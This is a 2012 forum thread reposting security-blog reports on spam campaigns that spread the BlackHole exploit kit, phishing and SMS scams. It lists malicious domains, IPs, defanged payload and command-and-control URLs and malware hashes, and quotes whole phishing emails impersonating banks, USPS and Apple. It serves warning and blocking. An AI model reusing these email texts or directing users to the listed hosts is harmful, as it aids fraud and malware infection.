... I've broken the list into three parts, it's a bit messy sorry... this long list (too long to post here) contains other detected domains on the same IP. Frankly, blocking the IP address is the most easy option.. there are actually more domains than listed here and some are duplicated, but it's the best I could do at the moment. Many of these domains show as evil in Google's Safe Browsing Diagnostics (example*) and I can find -zero- legitimate domains on this IP..."
* https://www.google.com/safebrowsing/diagnostic?site=acutefile.asia
** https://www.google.com/safebrowsing/diagnostic?site=AS:29550
** https://www.google.com/safebrowsing/diagnostic?site=AS:51377
___
Fake statistics domains lead to malware
- http://blog.dynamoo.com/2012/11/fake-statistics-domains-lead-to-malware.html
5 Nov 2012 - "The following fake "statistics" domains lead to malware. All have been registered very recently in the past few days and are used as a redirector to other exploit kits. Perhaps they are actually performing black hat statistical tracking. Blocking them (or the associated IPs) would be wise.
bilingstats .org
bombast-atse .org
bombastatse .org
ceastats .org
colinstats .org
expertstats .org
informazionestatistica .org
melestats .org
nonolite .org
statisticaeconomica .org
statspps .org
superbombastatse .org
topbombastatse .org
ufficiostatistica .org
Hosting IPs:
31.193.133.212 (Simply Transit, UK)
91.186.19.42 (Simply Transit, UK)
95.211.180.143 (Leaseweb, Netherlands) ..."
___
Dynamic DNS sites you might want to block
- http://blog.dynamoo.com/2012/11/dynamic-dns-sites-you-might-want-to.html
5 Nov 2012 - "These domains belong to ChangeIP .com, which I guess is a legitimate company providing Dynamic DNS services, but one that is being abused by the bad guys. These will be used with some random subdomain unless it's a corporate site (like ChangeIP .com itself) pointing to a random IP address somewhere.. so blocking IPs won't work here.
There are two versions of this list, one links through to the Google Safe Browsing diagnostics report in case you want to review them on a case-by-case basis before blocking them. The second one is a plain list of everything in case you want to block them completely. You might notice one of the domains is called b0tnet .com which is a peculiar name for a legitimate business to register..."
(More detail at the URL above.)
:mad::mad::mad:
AplusWebMaster
2012-11-06, 15:11
FYI...
Bogus USPS emails lead to malware
- http://blog.webroot.com/2012/11/06/usps-postal-notification-themed-emails-lead-to-malware/
Nov 6, 2012 - "... mass mailing millions of emails impersonating The United States Postal Service (USPS), in an attempt to trick its customers into downloading and executing the malicious .zip archive linked in the bogus emails. Upon execution, the malware opens a backdoor on the affected host, allowing the cybercriminals behind the campaign to gain complete control over the host...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/usps_email_spam_malware.jpg
Spamvertised compromised URL: hxxp ://www .unser-revier-bruchtorf-ost .de/FWUJKKOGMP.html
Actual malicious archive URL: hxxp ://www .unser-revier-bruchtorf-ost .de/Shipping_Label_USPS.zip
Detection rate: MD5: 089605f20e02fe86b6719e0949c8f363 * ... UDS:DangerousObject.Multi.Generic
Upon execution, the sample phones back to the following URLs...
(See the 1st webroot URL above - long list of IPs.) ... 64.151.87.152, 66.7.209.185, 173.224.211.194, 46.105.121.86, 222.255.237.132, 64.151.87.152, 79.170.89.209, 217.160.236.108, 88.84.137.174, 46.105.112.99, 50.22.136.150, 130.88.105.45, 91.205.63.194, 95.173.180.42, 217.160.236.108 ..."
* https://www.virustotal.com/file/372b436a2ffb66b9f7a45d172320e0c1298d24a877d17877118647a04af6814e/analysis/1351876562/
File name: Shipping_Label_USPS.exe
Detection ratio: 5/44
Analysis date: 2012-11-02
___
SMS SPAM: "Records passed to us show you're entitled to a refund approximately £2130"
- http://blog.dynamoo.com/2012/11/sms-spam-records-passed-to-us-show.html
6 Nov 2012 - "More SMS spam from.. well, I think the ICO will shortly reveal who. It's not just a spam, but it's also a scam because the spammers are attempting to persuade you to make fraudulent claims. Not everyone is eligible for a PPI refund, and I'm certainly not.. no "records" exist, it's just a scammy sales pitch. Avoid.
Records passed to us show you're entitled to a refund approximately £2130 in compensation from mis-selling of PPI on your credit card or loan.Reply INFO or stop
In this case, the sender's number is +447585858897, although it will change as it gets blocked by the networks. If you get one of these, you should forward the spam and the sender's number to your carrier. In the case of T-Mobile, O2 and Orange the number to report to is 7726 ("SPAM"). Vodafone customers should use 87726 ("VSPAM") and Three customers should use 37726 ("3SPAM"). Hopefully the carriers will act if there are enough complaints."
___
Fake Apple "Account Info Change" SPAM / welnessmedical .com
- http://blog.dynamoo.com/2012/11/apple-account-info-change-spam.html
6 Nov 2012 - "Not malware this time, but Pharma spam.. the links in this fake Apple message lead to welnessmedical .com.
From: Apple [ appleid @ id.arcadiadesign .it]
Sent: Tue 06/11/2012 18:30
Subject: Account Info Change
Hello,
The following information for your Apple ID [redacted] was updated on 11/06/2012:
Date of birth
Security question(s) and answer(s)
If these changes were made in error, or if you believe an unauthorized person accessed your account, please reset your account password immediately by going to iforgot.apple.com.
To review and update your security settings, sign in to appleid.apple.com.
This is an automated message. Please do not reply to this email. If you need additional help, visit Apple Support.
Thanks,
Apple Customer Support
TM and copyright © 2012 Apple Inc. 1 Infinite Loop, MS 96-DM, Cupertino, CA 95014.
All Rights Reserved / Keep Informed / Privacy Policy / My Apple ID
The fake pharma site (welnessmedical.com) is hosted on 84.22.127.43 along with a bunch of other ones, plus some additional sites one IP over at 84.22.127.44... Oddly, 84.22.127.43 doesn't seem to be registered at RIPE. No matter, we know who the owner of 84.22.127.0 is.. our old friends Cyberbunker again, who have registered the block with fake details. How RIPE lets them get away with this I don't know. If you can, I recommend blocking the entire 84.22.96.0/19 range as almost everything here is pretty seedy. You can read more about Cyberbunker's very dark grey hat activities over at Wikipedia* if you want more information."
* http://en.wikipedia.org/wiki/CyberBunker
___
Fake "Scan from a Xerox WorkCentre Pro" / peneloipin .ru
- http://blog.dynamoo.com/2012/11/scan-from-xerox-workcentre-pro.html
6 Nov 2012 - "This fake printer spam leads to malware on peneloipin .ru:
From: Keshawn Burns - MaribelParchment @ hotmail .com
Sent: 06 November 2012 05:09
Subject: Scan from a Xerox WorkCentre Pro #47938830
Please open the attached document. It was scanned and sent
to you using a Xerox WorkCentre Pro.
Sent by: Keshawn
Number of Images: 5
Attachment File Type: .HTML [Internet Explorer file]
Xerox WorkCentre Location: machine location not set
The attachment contains some obfuscated Javascript that redirects the visitor to a malicious payload on [donotclick]peneloipin .ru:8080/forum/links/column.php hosted on some IPs that have been used several times before for malware:
65.99.223.24 (RimuHosting, US)
103.6.238.9 (Universiti Putra, Malaysia)
203.80.16.81 (MYREN, Malaysia)
The following malicious domains are also hosted on the same servers:
forumibiza .ru
kiladopje .ru
donkihotik .ru
lemonadiom .ru
peneloipin .ru
panacealeon .ru
finitolaco .ru
fidelocastroo .ru
ponowseniks .ru
dianadrau .ru
panalkinew .ru
fionadix .ru ..."
:mad:
AplusWebMaster
2012-11-07, 13:13
FYI...
Fake ‘Fwd: Scan from a Xerox W. Pro’ emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/11/07/fwd-scan-from-a-xerox-w-pro-themed-emails-lead-to-black-hole-exploit-kit/
Nov 7, 2012 - "... malicious cybercriminals spamvertise millions of emails attempting to trick end users into thinking that they’ve received a scanned document. Upon clicking on the links found in these emails, or viewing the malicious .html attachment, users are automatically exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit... The first is mimicking a Xerox Pro printer, and the second is claiming to be a legitimate Wire Transfer. Both of these campaigns point to the same client-side exploits serving URL, indicating that they’ve been launched by the same cybercriminal/gang of cybercriminals.
Sample screenshots of the spamvertised emails:
> https://webrootblog.files.wordpress.com/2012/11/xerox_email_spam_exploits_malware.png
> https://webrootblog.files.wordpress.com/2012/11/xerox_email_spam_exploits_malware_01.png
... sample javascript obfuscation: MD5: 0a8a06770836493a67ea2e9a1af844bf * ... Mal/JSRedir-M
... dropped malware: MD5: 194655f7368438ab01e80b35a5293875 ** ... Trojan-Ransom.Win32.PornoAsset.avzz
panalkinew .ru responds to the following IPs – 203.80.16.81, AS24514; 209.51.221.247, AS10297; 213.251.171.30, AS16276 ..."
* https://www.virustotal.com/file/c65505c7d00e01f0afed0e35949af275c0ed50208640000a2c612be19471ea40/analysis/
File name: Scan_N13004.htm
Detection ratio: 24/44
Analysis date: 2012-11-05
** https://www.virustotal.com/file/f8aa0ca5b78e08bec43cf32cfdebd205c984089aea6a8eae992ebaccc5275ed8/analysis/
File name: d34c2e80562a36fb762be72e490b7793887c3192
Detection ratio: 25/43
Analysis date: 2012-11-01
___
Fake Intercompany Invoice SPAM / controlleramo .ru
- http://blog.dynamoo.com/2012/11/intercompany-invoice-spam.html
7 Nov 2012 - "This fake invoice spam leads to malware on controlleramo .ru:
Date: Wed, 7 Nov 2012 07:29:44 -0500
From: LinkedIn [welcome@linkedin.com]
Subject: Re: Intercompany inv. from Beazer Homes USA Corp.
Attachments: Invoice_e49580.htm
Hi
Attached the corp. invoice for the period July 2012 til Aug. 2012.(Internet Explorer file)
Thanks a lot for supporting this process
Rihanna PEASE
Beazer Homes USA Corp.
The attachment contains obfuscated Javascript that attempts to direct the visitor to a malicious payload at [donotclick]controlleramo .ru:8080/forum/links/column.php hosted on:
103.6.238.9 (Universiti Putra, Malaysia)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNet, US)
These IP addresses have been used in several attacks recently, and you should block access to them if you can."
___
Phishers take aim at USAA
- http://www.gfi.com/blog/phishers-take-aim-at-usaa/
Nov 7, 2012 - "Customers of the United Services Automobile Association, or USAA, are confronted with a faceless threat and may likely find themselves within enemy territory... if they’re not careful enough. Our researchers in the AV Labs spotted a phishing attack aimed at USAA customers who are mainly military service members, veterans and their families. The attack starts with the following spam:
> http://www.gfi.com/blog/wp-content/uploads/2012/11/USAACred_115.png
From: {random}
To: {random}
Subject: USAA – Account Security Update
Message body:
Dear Valued Customer,
We detected irregular activities on your USAA Internet Banking account. Your Internet banking account has been temporarily suspended for
your protection, you must verify this activity before you can continue using your Internet banking account with USAA Bank.
Please follow the reference link below to verify your account.
Click here to verify
Security advice : Always log-off completely your Internet banking account after using internet banking from a public places or computer for security
reasons.
Thank you,
USAA Internet Banking.
Once a recipient clicks Click here to verify, he/she is then taken to a legitimate-looking USAA login page... take note of the URL:
> http://www.gfi.com/blog/wp-content/uploads/2012/11/usaa011.png
This phishing page asks for a member’s Online ID, password and the PIN number of their USAA-issued credit or debit card, which the phishers made a compulsory detail to add on the login page. Note, however, that the actual USAA login page* does -not- ask for their members’ PINs. PIN numbers can personally identify individuals and their owners must only have sole knowledge of them. Members must never disclose them to any service provider or individual. Likewise, service providers must never ask for them (as proof of membership) nor store them in any form. Private citizens are also not safe from this phishing attack. Although USAA caters more to the military folks and their families, USAA has made available its online banking service to anyone, locally and internationally. USAA clients should be aware that phishing attacks are happening not just to online banking and e-commerce sites but also to financial services and insurance companies. We advise recipients of the phishing email to -delete- it from their inboxes..."
* https://www.usaa.com/inet/ent_logon/Logon
>> https://www.usaa.com/inet/pages/advice_12_common_scams?SearchRanking=6&SearchLinkPhrase=phishing%20email
>>> https://www.youtube.com/watch?feature=player_embedded&v=KYiKATvQvWw#!
:fear::mad:
AplusWebMaster
2012-11-08, 14:23
FYI...
Fake Discover Card emails serve client-side exploits and malware
- http://blog.webroot.com/2012/11/08/your-discover-card-services-blockaded-themed-emails-serve-client-side-exploits-and-malware/
8 Nov 2012 - "Cybercriminals are currently spamvertising millions of emails impersonating Discover, in an attempt to trick cardholders into clicking on the client-side exploits serving URLs found in the malicious emails. Upon clicking on the links, users are exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit.
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/discover_email_spam_exploits_malware.png
... Sample detection rate for the dropped malware: MD5: 80601551f1c83ee326b3094e468c6b42 * ... UDS:DangerousObject.Multi.Generic
Upon execution, the sample phones back to 200.169.13.84 :8080/AJtw/UCyqrDAA/Ud+asDAA, AS21574
Client-side exploits serving domain reconnaissance:
teamscapabilitieswhich.org responds to 183.180.134.217, AS2519 – Email: anil_valiquette124 @ dawnsonmail .com
Name Server: NS1.CHELSEAFUN.NET – 173.234.9.89
Name Server: NS2.CHELSEAFUN.NET – 65.131.100.90
netgear-india .net – 183.180.134.217, AS2519
Name Server: NS1.TOPPAUDIO .COM - 91.216.93.61
Name Server: NS2.TOPPAUDIO .COM - 173.234.9.89 ..."
* https://www.virustotal.com/file/44c36b250355195a4ebf1abccc7ac15c76f700e323fbd7e86d3bc4f04ea50589/analysis/
File name: KB01474670.exe
Detection ratio: 4/44
Analysis date: 2012-11-02
___
getyourbet .org injection attack
- http://blog.dynamoo.com/2012/11/getyourbetorg-injection-attack.html
8 Nov 2012 - "There seems to be an injection attack doing the rounds, the injected domain is getyourbet .org hosted on 31.184.192.237. The domain registration details are:
Registrant ID:TOD-42842658
Registrant Name:ChinSec
Registrant Organization:ChinSec
Registrant Street1:Beijing
Registrant Street2:
Registrant Street3:
Registrant City:Beijing
Registrant State/Province:BJ
Registrant Postal Code:519000
Registrant Country:CN
Registrant Phone:+86.5264337745
Registrant Phone Ext.:
Registrant FAX:+86.5264337745
Registrant FAX Ext.:
Registrant Email:chinseccdomains @ yahoo .com
The domain was created on 12th October. The IP address is in Russia (PIN-DEDICATEDSERVERS-NET).
This is a two stage attack, if getyourbet .org is called with the correct referrer parameters then the victim ends up at another server at 64.202.123.3 (Hostforweb, US) that tries to serve up a malicious payload. This server contains a bunch of subdomains from a hacked GoDaddy account.
pin.panacheswimwear .co.uk
physical.oneandonlykanuhura .com
pig.onmailorder .com
picture.onlyplussizes .com
person.nypersonaltrainers .com
pipe.payday-loanstoday .com
I've seen this sort of abuse of GoDaddy domains before, the main "www" domain resolves OK, but the subdomains get pointed elsewhere. There's either a problem with GoDaddy or this is done through a phish.
Anyway, block 64.202.123.3 and 31.184.192.237 if you can to prevent further attacks."
:mad:
AplusWebMaster
2012-11-09, 15:09
FYI...
Fake Intuit emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/11/09/payroll-account-holded-by-intuit-themed-emails-lead-to-black-hole-exploit-kit/
Nov 9, 2012 - "Intuit users, beware! Cybercriminals are currently mass mailing millions of emails impersonating Intuit’s Direct Deposit Service, in an attempt to trick its users into clicking on the malicious links found in the legitimate-looking emails. Upon clicking on -any- of them, users are exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/intuit_spam_email_exploits_malware.png
... Detection rate for the dropped malware: MD5: ebe81fe9a632726cb174043f6ac93e46 * ... Trojan.Win32.Bublik.qqf
Client-side exploits serving domain reconnaissance:
savedordercommunicates .info – 75.127.15.39, AS36352 – Email: heike_ruigrok32 @ naplesnews .net
Name Server: NS1.CHELSEAFUN .NET – 173.234.9.89, AS15003 – also responding to the same IP is the following malicious name server: ns1.nationalwinemak .com
Name Server: NS2.CHELSEAFUN .NET – 65.131.100.90, AS209
We’ve already seen the -same- name servers used in the previously profiled “‘Your Discover Card Services Blockaded’ themed emails serve client-side exploits and malware” malicious campaign, indicating that both of these campaigns are managed by the same malicious party.
Responding to the same IP (75.127.15.39) is also the following malicious domain:
teamscapabilitieswhich .org..."
* https://www.virustotal.com/file/4619216c7a5168b2a3ccc048ac0a53b94bccc787574dd3929770d99c279c1e14/analysis/
File name: download
Detection ratio: 29/44
Analysis date: 2012-11-08
___
Changelog SPAM / canadianpanakota .ru
- http://blog.dynamoo.com/2012/11/changelog-spam-canadianpanakotaru.html
9 Nov 2012 - "This spam leads to malware on canadianpanakota .ru:
Date: Fri, 9 Nov 2012 11:55:11 +0530
From: LinkedIn Password [password @ linkedin .com]
Subject: Re: Changlog 10.2011
Attachments: changelog4-2012.htm
Hello,
as promised changelog,(Internet Explorer File)
The attachment leads to a malicious payload at [donotclick]canadianpanakota .ru :8080/forum/links/column.php hosted on the following IPs:
120.138.20.54 (SiteHost, New Zealand)
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
These IPs will probably be used in other attacks, blocking access to them now might be prudent. The following IPs and domains are all related:
120.138.20.54
202.180.221.186
203.80.16.81
canadianpanakota .ru
controlleramo .ru
donkihotik .ru
finitolaco .ru
fionadix .ru
forumibiza .ru
lemonadiom .ru
peneloipin .ru
moneymakergrow .ru ..."
:mad:
AplusWebMaster
2012-11-12, 13:21
FYI...
Fake American Express emails serve client-side exploits and malware...
- http://blog.webroot.com/2012/11/12/american-express-alert-your-transaction-is-aborted-themed-emails-serve-client-side-exploits-and-malware/
Nov 12, 2012 - "American Express cardholders, beware! Over the past week, cybercriminals mass mailed millions of emails impersonating American Express, in an attempt to trick its customers into clicking on the malicious links found in the emails. Upon clicking on any of the links, users are redirected to a malicious URL serving cllient-side exploits courtesy of the BlackHole Exploit Kit....
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/american_express_email_exploits_malware.png
... Malicious domain name reconnaissance:
stempare .net – 109.123.220.145, AS15685 – Email: rebe_bringhurst1228 @ i-connect .com
Name Server: NS1.TOPPAUDIO .COM – 91.216.93.61, AS50300 – Email: windowclouse @ hotmail .com
Name Server: NS2.TOPPAUDIO .COM – 29.217.45.138 – Email: windowclouse @ hotmail .com ...
Upon loading of the malicious URL, a malicious PDF file exploiting CVE-2010-0188 is used to ultimately drops the actual payload – MD5: c8c607bc630ee2fe6a8c31b8eb03ed43 * ... Trojan.Win32.Bublik.ptf...
Upon execution, the dropped malware requests a connection to 192.5.5.241 :8080 and then establishes a connection with 210.56.23.100 :8080/Ajtw/UCygrDAA/Ud+asDAA (AS7590, Commission For Science And Technology, Pakistan). The following domain responds to this IP: discozdata .org. It is currently blacklisted in 25 anti-spam lists. The following URLs are known to have (been) directly serving malicious content, and act as command and control servers in the past:
210.56.23.100 :8080/asp/intro.php
210.56.23.100 :8080/za/v_01_a/in ...
The last time we came across this IP (210.56.23.100), was in July 2012's analysis of yet another malicious campaign, this time impersonating American Airlines..."
* https://www.virustotal.com/file/06afca28452c39cacc7791f89c70f97bf948e271520a6b893c75ad3abf0c6182/analysis/
File name: c8c607bc630ee2fe6a8c31b8eb03ed43
Detection ratio: 15/43
Analysis date: 2012-11-02
___
Cableforum.co .uk hacked?
- http://blog.dynamoo.com/2012/11/cableforumcouk-hacked.html
12 Nov 2012 - "Cableforum.co .uk is a popular and useful UK site about digital TV and broadband. Unfortunately, the email address list has leaked out and is being used for spamming, for example:
NatWest : Helpful Banking
Dear Valued Member ;
To prevent unauthorized access to your accounts, your online service has been temporarily locked. No further log in attempts will be accepted.
This is a procedure that automatically occur when an invalid information is submitted during the log in process.
Please follow the provided steps below to confirm your identity
and restore your online access...
> https://lh3.ggpht.com/-v0aFooReF9M/UKD3p5kUNjI/AAAAAAAAAxY/oFfCiZV5IR4/s1600/natwest.png
This is a standard NatWest phish. It doesn't originate from Cableforum.co.uk or its servers, but it is sent to an address ONLY used for Cableforum, so it must have leaked out somehow... Sadly, crap like this happens to good websites... Clearly there has been a problem for several months, although it isn't clear when such an address leak occurred or what data was taken with it. You should always assume that the passwords have been compromised and change it, plus change it anywhere that you re-use the same password."
:mad:
AplusWebMaster
2012-11-12, 22:28
FYI...
Blackhole exploit kit - top threat by a large margin
- https://blogs.technet.com/b/security/archive/2012/11/12/blackhole-exploit-kit-activity-peaks-as-exploit-activity-on-the-internet-reaches-new-heights.aspx
12 Nov 2012 - "... exploit activity has increased substantially over the past year... large increases in HTML/JavaScript exploit activity and Oracle Java exploit activity are major contributors to this trend... the top threat family driving these detections is Blacole, also known as the “Blackhole” exploit kit. Blacole, a family of exploits used by the so-called Blackhole exploit kit to deliver malicious software through infected webpages, was the most commonly detected exploit family in the first half of 2012 by a large margin*. This kit can be bought or rented on hacker forums and through other illegitimate outlets. The kit consists of a collection of malicious webpages that contain exploits for vulnerabilities in versions of Adobe Flash Player, Adobe Reader, Microsoft Data Access Components (MDAC), the Oracle Java Runtime Environment (JRE), and other popular products and components** ... In years past it was rare to see an exploit in the top ten list of threats for a country/region. In 2012-Q2 at least one exploit was in the top ten list of threats for 51 locations of the 105 countries/regions (49%) reported on in SIRv13***. Blacole is in the top ten lists of twenty-seven of these locations ..."
* https://blogs.technet.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-50-43/3683.2.jpg
** https://blogs.technet.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-50-43/6443.1.jpg
*** http://www.microsoft.com/security/sir/threat/default.aspx
___
New Java attack introduced into "Cool Exploit Kit"
- https://threatpost.com/en_us/blogs/new-java-attack-introduced-cool-exploit-kit-111212
Nov 12, 2012 - "A new exploit has been found in the Cool Exploit Kit for a vulnerability* in Java 7 Update 7 as well as older versions, a flaw that’s been patched by Oracle in Java 7 Update 9. Cool Exploit Kit was discovered last month and is largely responsible for dropping the Reveton ransomware. A new Metasploit module was introduced last night by researcher Juan Vazquez, developer Eric Romang said. Romang, a frequent Metasploit contributor, suggested it’s likely the exploit has been in the wild for a period of time and has only now been integrated into an exploit kit... Researchers are concerned now that this exploit is in Cool Exploit Kit, it could find its way into the BlackHole Exploit Kit... Reveton is linked to the Citadel banking and botnet malware..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5076 - 10.0 (HIGH)
:mad::mad:
AplusWebMaster
2012-11-13, 17:40
FYI...
Fake "Your flight" SPAM / monacofrm .ru
- http://blog.dynamoo.com/2012/11/your-flight-spam-monacofrmru.html
13 Nov 2012 - "These spam email messages lead to malware on monacofrm .ru:
From: sales1 @victimdomain .com
Sent: 13 November 2012 04:04
Subject: Fwd: Your Flight A874-64581
Dear Customer,
FLIGHT NR: 1173-8627
DATE/TIME : JAN 27, 2013, 19:15 PM
ARRIVING AIRPORT: SAN-DIEGO AIRPORT
PRICE : 520.40 USD
Your bought ticket is attached to the letter as a scan document .
To use your ticket you should print it.
NAOMI PATTON,
==========
From: messages-noreply @bounce .linkedin .com On Behalf Of LinkedIn
Sent: 13 November 2012 05:18
Subject: Re: Fwd: Your Flight A943-6733
Dear Customer,
FLIGHT NR: 360-6116
DATE/TIME : JAN 26, 2013, 14:12 PM
ARRIVING AIRPORT: SAN-DIEGO AIRPORT
PRICE : 997.25 USD
Your bought ticket is attached to the letter as a scan document .
To use your ticket you should print it.
Adon Walton,
(...etc.)
The malicious payload is at [donotclick]monacofrm.ru:8080/forum/links/column.php hosted on the following IPs:
202.180.221.186 (GNet, Mongolia)
203.80.16.81 (MYREN, Malaysia)
216.24.194.66 (Psychz Networks, US)
The Mongolian and Malaysian IPs have been used several times for malware attacks, 216.24.194.66 looks like a new one. Blocking them all would probably be prudent.
Added: There's a Wire Transfer SPAM using the same payload too:
From: Amazon.com / account-update @amazon .com
Sent: 13 November 2012 08:08
Subject: Fwd: Re: Wire Transfer Confirmation
Dear Bank Account Operator,
WIRE TRANSFER: FED8979402863338715
CURRENT STATUS: PENDING
Please REVIEW YOUR TRANSACTION as soon as possible.
___
Fake "End of Aug. Statmeent" SPAM / veneziolo .ru
- http://blog.dynamoo.com/2012/11/end-of-aug-statmeent-spam-venezioloru.html
13 Nov 2012 - "The spam never stops, this malicious email leads to malware at veneziolo .ru:
Date: Tue, 13 Nov 2012 12:27:15 -0500
From: Mathilda Allen via LinkedIn [member @linkedin .com]
Subject: Re: End of Aug. Statmeent required
Attachments: Invoices12-2012.htm
Good morning,
as reqeusted I give you inovices issued to you per sept. (Internet Explorer format)
Regards
The malicious payload is at [donotclick]veneziolo .ru:8080/forum/links/column.php hosted on the same IPs seen earlier today, the following IPs and domains are all related:
41.168.5.140, 62.76.46.195, 62.76.178.233, 62.76.186.190, 62.76.188.246, 65.99.223.24, 84.22.100.108, 85.143.166.170, 87.120.41.155, 91.194.122.8, 103.6.238.9, 120.138.20.54, 132.248.49.112, 202.180.221.186,
203.80.16.81, 207.126.57.208, 209.51.221.247, 213.251.171.30, 216.24.194.66 ..."
:mad::mad:
AplusWebMaster
2012-11-14, 14:54
FYI...
Fake ‘PayPal Account Modified’ emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/11/14/paypal-account-modified-themed-emails-lead-to-black-hole-exploit-kit/
Nov 14, 2012 - "A cybercriminal/group... continues to systematically rotate the impersonated brands and the actual malicious payload dropped by the market leading Black Hole Exploit Kit. The prospective target of their latest campaign? PayPal users...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/11/paypal_email_spam_exploits_malware.png
... Malicious domain name reconnaissance: puzzledbased .net – 183.180.134.217, AS2519 – Email: rodger_covach3060 @ spacewar .com
Name Server: NS1.TOPPAUDIO .COM
Name Server: NS2.TOPPAUDIO .COM
Although we couldn’t reproduce puzzledbased .net’s malicious activity, we know for certain that on 2012/11/01 at 15:19, hxxp ://netgear-india .net/detects/discover-important_message.php was responding to the same IP. We’ve already seen and profiled the malicious activity of the campaign using this URL in the “‘Your Discover Card Services Blockaded’ themed emails serve client-side exploits and malware analysis...
The following malicious domains are also part of the campaign’s infrastructure and respond to the same IP (183.180.134.217) as the client-side exploits serving domains:
rovo .pl
itracrions .pl
superdmntre .com
chicwhite .com
radiovaweonearch .com
strili .com
superdmntwo .com
unitmusiceditior .com
newtimedescriptor .com
steamedboasting .info
solla.at votela .net
stempare .net
tradenext .net
bootingbluray .net
The following malicious domain (stempare .net) was also seen in the recently profiled “‘American Express Alert: Your Transaction is Aborted’ themed emails serve client-side exploits and malware” campaign, indicating yet another connection between these campaigns..."
___
promotesmetasearch .net promotes malware
From the WeAreSpammers blog: http://wearespammers.blogspot.co.uk/2012/11/launch-of.html
- http://blog.dynamoo.com/2012/11/promotesmetasearchnet-promotes-malware.html
14 Nov 2012 - "This looks like a fake get-rich-quick scam email which is actually intended to distribute malware. Originating IP is 5.39.101.233 (OVH, Germany). Spamvertised domains are 8mailer .com on 5.39.101.225 (OVH, Germany) and promotesmetasearch .net on 46.249.38.27 (Serverius Holding, Netherlands). This last one is kind of interesting, because 1) it's all in French and 2) it contains a virus. The malware attempts to download an exploit kit from [donotclick]vodkkaredbuuull .chickenkiller .com/trm/requesting/requesting-pass_been_loaded.php which is kind of unfriendly, hosted on the same IP address.
The WHOIS details show a completely different name and address from the one quoted on the email:
Florence Buker
florence_buker05 @rockfan .com
7043 W Avenue A4
93536 Lancaster
United States
Tel: +1.4219588211
Clearly the owner of promotemetasearch .net is up to no good, and I would suggest the Anthony Tomei connection might well be completely bogus.
From: Anthony Tomei admin @8 mailer .com
Reply-To: info @ promotesmetasearch .net
To: donotemail @ wearespammers .com
Date: 14 November 2012 18:22
Subject: launch of
Dear Future Millionaire,
Making $100,000 per month is not hard. In fact, there are 2 ways you accomplish this easy task of making money in a short period of time.
The first way is to...
Anthony Tomei is an Expert Internet Network Marketer. Anthony is known as the Master Marketer and practically gives away all of his secrets, methods and marketing techniques... You should probably regard the domain chickenkiller .com as compromised and block it. Additionally, all the following IPs and domains are related and a probably malicious.
46.249.38.21
46.249.78.23
46.249.38.27
deficiencieshiss .net
personaloverly .net
spaceyourfilesbig.chickenkiller .com
vodkkaredbuuull.chickenkiller .com
firefoxslacker .pro
personaloverly .net
wowteammy113 .org
logicalforced .org
flashkeyed .org
incidentindie .org
sufficeextensible .org
laughspadstyle .org
check-update .org
softtwareupdate .org
internallycontentchecking .org
cordlesssandboxing .org
westsearch .org
perclickbank .org
trayscoffeecup .org
agreedovetails .org
commencemessengers .org
dfgs453t .org
disappointmentcontent .org
whiskeyhdx .org
uhgng43fgjl82309dfg99df1 .com
rethnds732 .com
odiushb327 .com
a6q7 .com
makosl .com
noticablyccleaner .com
leisurelyadventures .com
invitedns .com
srv50 .in
flacleaderboard.in
frwdlink .in
tgy56fd3fj.firm .in
warrantynetwork .co .in
kclicksnet .in
reelshandsoff .info
scatteredavtestorg .info
ap34 .pro
trafficgid .pro
stop2crimepeople .pro
huge4floorhouse .pro
exportlite .pro
weeembedding .pro
layer-grosshandel .pro
firefoxslacker .pro
s1topcrimefor .pro
opera-soft .pro
brauser-soft .pro
mp3soft .pro
pornokuca .net
licencesoftwareupda .net
settlementstored .net
licencesoftwareuppd .net
compartmentalizationwere .net
seniorhog .net
coinbatches .net
isnbreathy .net
mrautorun .ru
askedvisor .ru
srv50b .biz
vimeosseeing .biz
threatwalkthrough .biz
promotemetasearch .net ..."
:mad:
AplusWebMaster
2012-11-15, 13:56
FYI...
Opera site served Blackhole malvertising...
- http://www.theregister.co.uk/2012/11/15/opera_blackhole/
15 Nov 2012 - "Opera has suspended ad-serving on its portal as a precaution while it investigates reports that surfers were being exposed to malware simply by visiting the Norwegian browser firm's home page. Malicious scripts loaded by portal .opera .com were redirecting users towards a malicious site hosting the notorious BlackHole exploit kit, said a Romanian anti-virus firm BitDefender*, which said it had detected the apparent attack on its automated systems. BitDefender said it promptly warned Opera after it detected the problem on Wednesday. It seems likely the scripts had been loaded through a third-party advertisement, a practice commonly known as malvertising. Opera has yet to confirm the problem, but has disabled advertising scripts on its portal in case they are tainted..."
* http://www.hotforsecurity.com/blog/opera-users-exposed-to-blackhole-through-browser-homepage-4431.html
14 Nov 2012 - "... malicious page harbors the BlackHole exploit kit (we got served with the sample via a PDF file rigged with the CVE-2010-0188 exploit) that will infect the unlucky user with a freshly-compiled variant of ZBot, detected by Bitdefender as Trojan.Zbot.HXT. The ZBot malware is on a server in Russia which, most probably, has also fallen victim to a hacking attack, allowing unauthorized access via FTP..."
> http://www.hotforsecurity.com/wp-content/uploads/2012/11/Opera-Users-Exposed-to-BlackHole-through-Browser-Homepage-21.jpg
- http://www.h-online.com/security/news/item/Opera-s-web-portal-reportedly-deployed-online-banking-trojan-1751410.html?view=zoom;zoom=3
16 Nov 2012
___
Bogus BBB emails serve client-side exploits and malware
- http://blog.webroot.com/2012/11/15/bogus-better-business-bureau-themed-notifications-serve-client-side-exploits-and-malware/
